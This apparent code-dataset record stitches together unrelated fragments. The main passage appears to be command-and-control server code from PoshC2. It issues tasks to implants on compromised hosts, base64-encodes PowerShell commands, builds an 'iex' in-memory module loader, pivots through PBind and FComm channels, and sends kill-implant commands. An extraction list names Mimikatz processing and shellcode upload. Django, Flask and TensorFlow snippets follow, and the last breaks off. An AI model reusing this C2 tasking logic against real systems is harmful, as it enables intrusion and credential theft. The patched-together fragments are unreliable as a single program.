user_command = f"Uploading file: {upload_file} to {upload_file_destination} with md5sum: {filehash}"
taskId = DB.insert_task(RandomURI, user_command, user)
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
if len(str(taskId)) > 5:
raise ValueError('Task ID is greater than 5 characters which is not supported.')
print(Colours.YELLOW)
if user is not None and user != "":
print("Task %s (%s) issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, user, implant.ImplantID, implant.Domain, implant.User, implant.Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
else:
print("Task %s issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implant.ImplantID, implant.Domain, implant.User, implant.Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
try:
if (user_command.lower().startswith("run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("pbind-command run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("fcomm-command run-exe sharpwmi.program sharpwmi action=execute")):
print(user_command[0:200])
print("----TRUNCATED----")
else:
print(user_command)
print(Colours.END)
except Exception as e:
print("Cannot print output: %s" % e)
if task[2].startswith("loadmodule "):
try:
module_name = (task[2]).replace("loadmodule ", "")
if ".exe" in module_name:
modulestr = load_module_sharp(module_name)
elif ".dll" in module_name:
modulestr = load_module_sharp(module_name)
else:
modulestr = load_module(module_name)
command = "loadmodule%s" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
command=""
elif task[2].startswith("run-exe Program PS "):
try:
cmd = (task[2]).replace("run-exe Program PS ", "")
modulestr = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe Program PS %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-command run-exe Program PS "):
try:
cmd = (task[2]).replace("pbind-pivot-command run-exe Program PS ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
modulestr = base64.b64encode(f"run-exe Program PS {base64string}".encode("utf-8")).decode("utf-8")
doublebase64string = base64.b64encode(f"run-exe PBind PBind {modulestr}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % doublebase64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-command run-exe Program PS "):
try:
cmd = (task[2]).replace("pbind-command run-exe Program PS ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
modulestr = base64.b64encode(f"run-exe Program PS {base64string}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-command run-exe Program PS "):
try:
cmd = (task[2]).replace("fcomm-command run-exe Program PS ", "")
modulestr = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe FComm.FCClass FComm run-exe Program PS %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pslo "):
try:
module_name = (task[2]).replace("pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe Program PS loadmodule%s" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pslo"):
try:
module_name = (task[2]).replace("pbind-pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"run-exe Program PS loadmodule%s\"" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-loadmodule "):
try:
module_name = (task[2]).replace("pbind-pivot-loadmodule ", "")
if ".exe" in module_name or ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
base64string = base64.b64encode(f"run-exe PBind PBind \"loadmodule{modulestr}\"".encode("utf-8")).decode("utf-8")
command = f"run-exe PBind PBind {base64string}"
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-pslo"):
try:
module_name = (task[2]).replace("fcomm-pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"run-exe Program PS loadmodule%s\"" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-loadmodule "):
try:
module_name = (task[2]).replace("pbind-loadmodule ", "")
if ".exe" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"loadmodule%s\"" % modulestr
elif ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"loadmodule%s\"" % modulestr
else:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module(module_name)
command = "run-exe PBind PBind \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(bytes(modulestr, "utf-8")).decode('utf-8')
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-command "):
try:
cmd = command.replace("pbind-command ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % base64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-connect"):
command = command.replace("pbind-connect ", "run-exe PBind PBind start ")
elif task[2].startswith("pbind-kill"):
command = command.replace("pbind-kill", "run-exe PBind PBind kill-implant")
elif task[2].startswith("fcomm-loadmodule "):
try:
module_name = (task[2]).replace("fcomm-loadmodule ", "")
if ".exe" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr
elif ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr
else:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module(module_name)
command = "run-exe FComm.FCClass FComm \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(bytes(modulestr, "utf-8")).decode('utf-8')
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-command "):
command = command.replace("fcomm-command ", "run-exe FComm.FCClass FComm ")
elif task[2].startswith("fcomm-connect"):
command = command.replace("fcomm-connect ", "run-exe FComm.FCClass FComm start ")
elif task[2].startswith("fcomm-kill"):
command = command.replace("fcomm-kill", "run-exe FComm.FCClass FComm kill-implant")
elif task[2].startswith("pbind-pivot-command "):
try:
cmd = command.replace("pbind-pivot-command ", "")
base64string1 = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
base64string = base64.b64encode(f"run-exe PBind PBind {base64string1}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % base64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-connect"):
command = command.replace("pbind-pivot-connect ", "run-exe PBind PBind run-exe PBind PBind start ")
elif task[2].startswith("pbind-pivot-kill"):
command = command.replace("pbind-pivot-kill", "run-exe PBind PBind run-exe PBind PBind kill-implant")
# Uncomment to print actual commands that are being sent
# if "AAAAAAAAAAAAAAAAAAAA" not in command:
# print(Colours.BLUE + "Issuing Command: " + command + Colours.GREEN)
command = taskIdStr + command
if commands:
commands += "!d-3dion@LD!-d" + command
else:
commands += command
DB.del_newtasks(str(task[0]))
if commands is not None:
multicmd = "multicmd%s" % commands
try:
responseVal = encrypt(EncKey, multicmd)
except Exception as e:
responseVal = ""
print("Error encrypting value: %s" % e)
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
return responseVal
elif RandomURI in path and not tasks:
# if there is no tasks but its a normal beacon send 200
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
return default_response()
| [
"poshc2.server.Core.process_mimikatz",
"poshc2.server.database.DB.get_implanttype",
"base64.b64encode",
"poshc2.server.database.DB.get_implants_all",
"poshc2.server.database.DB.get_implantbyrandomuri",
"poshc2.server.database.DB.new_task",
"re.search",
"os.listdir",
"poshc2.Utils.randomuri",
"posh... | [((704, 727), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (725, 727), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((747, 768), 'poshc2.server.database.DB.get_implants_all', 'DB.get_implants_all', ([], {}), '()\n', (766, 768), True, 'import poshc2.server.database.DB as DB\n'), ((14384, 14405), 'poshc2.server.database.DB.get_implants_all', 'DB.get_implants_all', ([], {}), '()\n', (14403, 14405), True, 'import poshc2.server.database.DB as DB\n'), ((802, 938), 'poshc2.server.Core.print_bad', 'print_bad', (['"""Received post request but no implants in database... has the project been cleaned but you\'re using the same URLs?"""'], {}), '(\n "Received post request but no implants in database... has the project been cleaned but you\'re using the same URLs?"\n )\n', (811, 938), False, 'from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad\n'), ((1371, 1397), 'poshc2.server.Core.decrypt', 'decrypt', (['encKey', 'cookieVal'], {}), '(encKey, cookieVal)\n', (1378, 1397), False, 'from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad\n'), ((14587, 14613), 'poshc2.server.database.DB.get_newtasks', 'DB.get_newtasks', (['RandomURI'], {}), '(RandomURI)\n', (14602, 14613), True, 'import poshc2.server.database.DB as DB\n'), ((1464, 1497), 'poshc2.server.Core.decrypt', 'decrypt', (['encKey', 'post_data[1500:]'], {}), '(encKey, post_data[1500:])\n', (1471, 1497), False, 'from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad\n'), ((1544, 1588), 'poshc2.server.Core.decrypt_bytes_gzip', 'decrypt_bytes_gzip', (['encKey', 'post_data[1500:]'], {}), '(encKey, post_data[1500:])\n', (1562, 1588), False, 'from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad\n'), ((2451, 2482), 'poshc2.server.database.DB.get_cmd_from_task_id', 'DB.get_cmd_from_task_id', (['taskId'], {}), '(taskId)\n', (2474, 2482), True, 'import poshc2.server.database.DB as DB\n'), ((2512, 2537), 'poshc2.server.database.DB.get_task_owner', 'DB.get_task_owner', (['taskId'], {}), '(taskId)\n', (2529, 2537), True, 'import poshc2.server.database.DB as DB\n'), ((3547, 3589), 're.sub', 're.sub', (['"""123456(.+?)654321"""', '""""""', 'rawoutput'], {}), "('123456(.+?)654321', '', rawoutput)\n", (3553, 3589), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((3798, 3845), 'poshc2.server.PowerStatus.translate_power_status', 'translate_power_status', (['outputParsed', 'RandomURI'], {}), '(outputParsed, RandomURI)\n', (3820, 3845), False, 'from poshc2.server.PowerStatus import translate_power_status\n'), ((4016, 4068), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', '"""Module loaded successfully"""'], {}), "(taskId, 'Module loaded successfully')\n", (4030, 4068), True, 'import poshc2.server.database.DB as DB\n'), ((34569, 34592), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (34590, 34592), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((4264, 4309), 're.search', 're.search', (['"""PBind-Connected:.*"""', 'outputParsed'], {}), "('PBind-Connected:.*', outputParsed)\n", (4273, 4309), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((14839, 14875), 'poshc2.server.database.DB.get_implantbyrandomuri', 'DB.get_implantbyrandomuri', (['RandomURI'], {}), '(RandomURI)\n', (14864, 14875), True, 'import poshc2.server.database.DB as DB\n'), ((14911, 14940), 'poshc2.server.database.DB.get_implanttype', 'DB.get_implanttype', (['RandomURI'], {}), '(RandomURI)\n', (14929, 14940), True, 'import poshc2.server.database.DB as DB\n'), ((14967, 14990), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (14988, 14990), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((19288, 19333), 'poshc2.server.database.DB.insert_task', 'DB.insert_task', (['RandomURI', 'user_command', 'user'], {}), '(RandomURI, user_command, user)\n', (19302, 19333), True, 'import poshc2.server.database.DB as DB\n'), ((34385, 34410), 'poshc2.server.Core.encrypt', 'encrypt', (['EncKey', 'multicmd'], {}), '(EncKey, multicmd)\n', (34392, 34410), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((34861, 34884), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (34882, 34884), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((34997, 35015), 'poshc2.server.Core.default_response', 'default_response', ([], {}), '()\n', (35013, 35015), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((5110, 5186), 'poshc2.server.database.DB.new_task', 'DB.new_task', (['"""pbind-pivot-loadmodule Stage2-Core.exe"""', '"""autoruns"""', 'RandomURI'], {}), "('pbind-pivot-loadmodule Stage2-Core.exe', 'autoruns', RandomURI)\n", (5121, 5186), True, 'import poshc2.server.database.DB as DB\n'), ((5229, 5299), 'poshc2.server.database.DB.new_task', 'DB.new_task', (['"""pbind-loadmodule Stage2-Core.exe"""', '"""autoruns"""', 'RandomURI'], {}), "('pbind-loadmodule Stage2-Core.exe', 'autoruns', RandomURI)\n", (5240, 5299), True, 'import poshc2.server.database.DB as DB\n'), ((5420, 5465), 're.search', 're.search', (['"""FComm-Connected:.*"""', 'outputParsed'], {}), "('FComm-Connected:.*', outputParsed)\n", (5429, 5465), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((6013, 6083), 'poshc2.server.database.DB.new_task', 'DB.new_task', (['"""fcomm-loadmodule Stage2-Core.exe"""', '"""autoruns"""', 'RandomURI'], {}), "('fcomm-loadmodule Stage2-Core.exe', 'autoruns', RandomURI)\n", (6024, 6083), True, 'import poshc2.server.database.DB as DB\n'), ((6231, 6268), 'poshc2.server.database.DB.update_sleep', 'DB.update_sleep', (['new_sleep', 'RandomURI'], {}), '(new_sleep, RandomURI)\n', (6246, 6268), True, 'import poshc2.server.database.DB as DB\n'), ((21050, 21080), 'poshc2.server.Core.load_module_sharp', 'load_module_sharp', (['module_name'], {}), '(module_name)\n', (21067, 21080), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((6378, 6408), 'base64.b64decode', 'base64.b64decode', (['outputParsed'], {}), '(outputParsed)\n', (6394, 6408), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((6707, 6800), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', "('Screenshot captured: %s%s.png' % (DownloadsDirectory, filename))"], {}), "(taskId, 'Screenshot captured: %s%s.png' % (\n DownloadsDirectory, filename))\n", (6721, 6800), True, 'import poshc2.server.database.DB as DB\n'), ((7329, 7380), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', '"""Upload shellcode complete"""'], {}), "(taskId, 'Upload shellcode complete')\n", (7343, 7380), True, 'import poshc2.server.database.DB as DB\n'), ((21181, 21211), 'poshc2.server.Core.load_module_sharp', 'load_module_sharp', (['module_name'], {}), '(module_name)\n', (21198, 21211), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((21290, 21314), 'poshc2.server.Core.load_module', 'load_module', (['module_name'], {}), '(module_name)\n', (21301, 21314), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((22116, 22137), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (22135, 22137), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((6937, 7072), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', '"""Screenshot not captured, the screen could be locked or this user does not have access to the screen!"""'], {}), "(taskId,\n 'Screenshot not captured, the screen could be locked or this user does not have access to the screen!'\n )\n", (6951, 7072), True, 'import poshc2.server.database.DB as DB\n'), ((7743, 7794), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', '"""Upload shellcode complete"""'], {}), "(taskId, 'Upload shellcode complete')\n", (7757, 7794), True, 'import poshc2.server.database.DB as DB\n'), ((17802, 17837), 'base64.b64encode', 'base64.b64encode', (['upload_file_bytes'], {}), '(upload_file_bytes)\n', (17818, 17837), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((22978, 22999), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (22997, 22999), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((19081, 19120), 'base64.b64decode', 'base64.b64decode', (['upload_file_bytes_b64'], {}), '(upload_file_bytes_b64)\n', (19097, 19120), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((23685, 23706), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (23704, 23706), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((6492, 6503), 'poshc2.Utils.randomuri', 'randomuri', ([], {}), '()\n', (6501, 6503), False, 'from poshc2.Utils import randomuri\n'), ((11449, 11552), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', "('Download file part %s of %s to: %s' % (chunkNumber, totalChunks, filename))"], {}), "(taskId, 'Download file part %s of %s to: %s' % (chunkNumber,\n totalChunks, filename))\n", (11463, 11552), True, 'import poshc2.server.database.DB as DB\n'), ((12171, 12215), 'poshc2.server.Core.decrypt_bytes_gzip', 'decrypt_bytes_gzip', (['encKey', 'post_data[1500:]'], {}), '(encKey, post_data[1500:])\n', (12189, 12215), False, 'from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad\n'), ((24289, 24310), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (24308, 24310), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((24510, 24538), 'os.listdir', 'os.listdir', (['ModulesDirectory'], {}), '(ModulesDirectory)\n', (24520, 24538), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((24713, 24743), 'poshc2.server.Core.load_module_sharp', 'load_module_sharp', (['module_name'], {}), '(module_name)\n', (24730, 24743), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((9347, 9402), 'os.path.isfile', 'os.path.isfile', (["('%s%s' % (DownloadsDirectory, filename))"], {}), "('%s%s' % (DownloadsDirectory, filename))\n", (9361, 9402), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((9470, 9525), 'os.path.isfile', 'os.path.isfile', (["('%s%s' % (DownloadsDirectory, filename))"], {}), "('%s%s' % (DownloadsDirectory, filename))\n", (9484, 9525), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((10222, 10277), 'os.path.isfile', 'os.path.isfile', (["('%s%s' % (DownloadsDirectory, filename))"], {}), "('%s%s' % (DownloadsDirectory, filename))\n", (10236, 10277), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((11929, 11985), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', "('Error downloading file %s ' % e)"], {}), "(taskId, 'Error downloading file %s ' % e)\n", (11943, 11985), True, 'import poshc2.server.database.DB as DB\n'), ((12066, 12087), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (12085, 12087), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((12320, 12353), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', 'rawoutput'], {}), '(taskId, rawoutput)\n', (12334, 12353), True, 'import poshc2.server.database.DB as DB\n'), ((13575, 13606), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', 'message'], {}), '(taskId, message)\n', (13589, 13606), True, 'import poshc2.server.database.DB as DB\n'), ((14014, 14050), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', 'outputParsed'], {}), '(taskId, outputParsed)\n', (14028, 14050), True, 'import poshc2.server.database.DB as DB\n'), ((14067, 14097), 'poshc2.server.Core.process_mimikatz', 'process_mimikatz', (['outputParsed'], {}), '(outputParsed)\n', (14083, 14097), False, 'from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad\n'), ((14220, 14256), 'poshc2.server.database.DB.update_task', 'DB.update_task', (['taskId', 'outputParsed'], {}), '(taskId, outputParsed)\n', (14234, 14256), True, 'import poshc2.server.database.DB as DB\n'), ((25027, 25048), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (25046, 25048), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((25259, 25287), 'os.listdir', 'os.listdir', (['ModulesDirectory'], {}), '(ModulesDirectory)\n', (25269, 25287), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((25462, 25492), 'poshc2.server.Core.load_module_sharp', 'load_module_sharp', (['module_name'], {}), '(module_name)\n', (25479, 25492), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((10013, 10068), 'os.path.isfile', 'os.path.isfile', (["('%s%s' % (DownloadsDirectory, filename))"], {}), "('%s%s' % (DownloadsDirectory, filename))\n", (10027, 10068), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((25800, 25821), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (25819, 25821), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((26140, 26168), 'os.listdir', 'os.listdir', (['ModulesDirectory'], {}), '(ModulesDirectory)\n', (26150, 26168), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((26355, 26385), 'poshc2.server.Core.load_module_sharp', 'load_module_sharp', (['module_name'], {}), '(module_name)\n', (26372, 26385), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((26811, 26832), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (26830, 26832), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((27043, 27071), 'os.listdir', 'os.listdir', (['ModulesDirectory'], {}), '(ModulesDirectory)\n', (27053, 27071), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((27246, 27276), 'poshc2.server.Core.load_module_sharp', 'load_module_sharp', (['module_name'], {}), '(module_name)\n', (27263, 27276), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((27592, 27613), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (27611, 27613), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((27895, 27923), 'os.listdir', 'os.listdir', (['ModulesDirectory'], {}), '(ModulesDirectory)\n', (27905, 27923), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((28110, 28140), 'poshc2.server.Core.load_module_sharp', 'load_module_sharp', (['module_name'], {}), '(module_name)\n', (28127, 28140), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((29423, 29444), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (29442, 29444), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((28337, 28365), 'os.listdir', 'os.listdir', (['ModulesDirectory'], {}), '(ModulesDirectory)\n', (28347, 28365), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((28552, 28582), 'poshc2.server.Core.load_module_sharp', 'load_module_sharp', (['module_name'], {}), '(module_name)\n', (28569, 28582), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((28757, 28785), 'os.listdir', 'os.listdir', (['ModulesDirectory'], {}), '(ModulesDirectory)\n', (28767, 28785), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((28972, 28996), 'poshc2.server.Core.load_module', 'load_module', (['module_name'], {}), '(module_name)\n', (28983, 28996), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((29966, 29987), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (29985, 29987), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((30588, 30616), 'os.listdir', 'os.listdir', (['ModulesDirectory'], {}), '(ModulesDirectory)\n', (30598, 30616), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((30803, 30833), 'poshc2.server.Core.load_module_sharp', 'load_module_sharp', (['module_name'], {}), '(module_name)\n', (30820, 30833), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((32140, 32161), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (32159, 32161), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((31038, 31066), 'os.listdir', 'os.listdir', (['ModulesDirectory'], {}), '(ModulesDirectory)\n', (31048, 31066), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((31253, 31283), 'poshc2.server.Core.load_module_sharp', 'load_module_sharp', (['module_name'], {}), '(module_name)\n', (31270, 31283), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((31466, 31494), 'os.listdir', 'os.listdir', (['ModulesDirectory'], {}), '(ModulesDirectory)\n', (31476, 31494), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((31681, 31705), 'poshc2.server.Core.load_module', 'load_module', (['module_name'], {}), '(module_name)\n', (31692, 31705), False, 'from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response\n'), ((33327, 33348), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (33346, 33348), False, 'import datetime, hashlib, base64, traceback, os, re\n')] |
from django.urls import path, re_path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('countdown/', views.countdown, name='countdown'),
#re_path(r'.+', views.redir, name='redir'),
]
| [
"django.urls.path"
] | [((80, 115), 'django.urls.path', 'path', (['""""""', 'views.index'], {'name': '"""index"""'}), "('', views.index, name='index')\n", (84, 115), False, 'from django.urls import path, re_path\n'), ((121, 174), 'django.urls.path', 'path', (['"""countdown/"""', 'views.countdown'], {'name': '"""countdown"""'}), "('countdown/', views.countdown, name='countdown')\n", (125, 174), False, 'from django.urls import path, re_path\n')] |
# Copyright (C) 2013 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask import render_template, request
import view_base
class IndexView(view_base.ViewBase):
def __init__(self):
super(IndexView, self).__init__()
def run(self):
host, port = request.host.split(':')
return render_template('topology.html', host=host, port=port)
| [
"flask.render_template",
"flask.request.host.split"
] | [((819, 842), 'flask.request.host.split', 'request.host.split', (['""":"""'], {}), "(':')\n", (837, 842), False, 'from flask import render_template, request\n'), ((858, 912), 'flask.render_template', 'render_template', (['"""topology.html"""'], {'host': 'host', 'port': 'port'}), "('topology.html', host=host, port=port)\n", (873, 912), False, 'from flask import render_template, request\n')] |
import tensorflow as tf
import numpy as np
def clipped_error(x):
# Huber loss
try:
return tf.select(tf.abs(x) < 1.0, 0.5 * tf.square(x), tf.abs(x) - 0.5 )
except:
return tf.where(tf.abs(x) < 1.0, 0.5 * tf.square(x), tf.abs(x) - 0.5 )
def linear(input_, output_size, stddev=0.02, bias_start=0.0, activation_fn=None, name='linear', mask=None):
shape = input_.get_shape().as_list()
with tf.variable_scope(name):
w = tf.get_variable('Matrix', [shape[1], output_size], tf.float32,
tf.random_normal_initializer(stddev=stddev))
b = tf.get_variable('bias', [output_size],
initializer=tf.constant_initializer(bias_start))
out = tf.nn.bias_add(tf.matmul(input_, w), b)
#if mask is not None:
#out = tf.minimum(out, (2.0 * mask - 1.0) * np.finfo(np.float32).max)
if activation_fn is not None:
return activation_fn(out), w, b
else:
return out, w, b
| [
"tensorflow.variable_scope",
"tensorflow.random_normal_initializer",
"tensorflow.matmul",
"tensorflow.constant_initializer",
"tensorflow.square",
"tensorflow.abs"
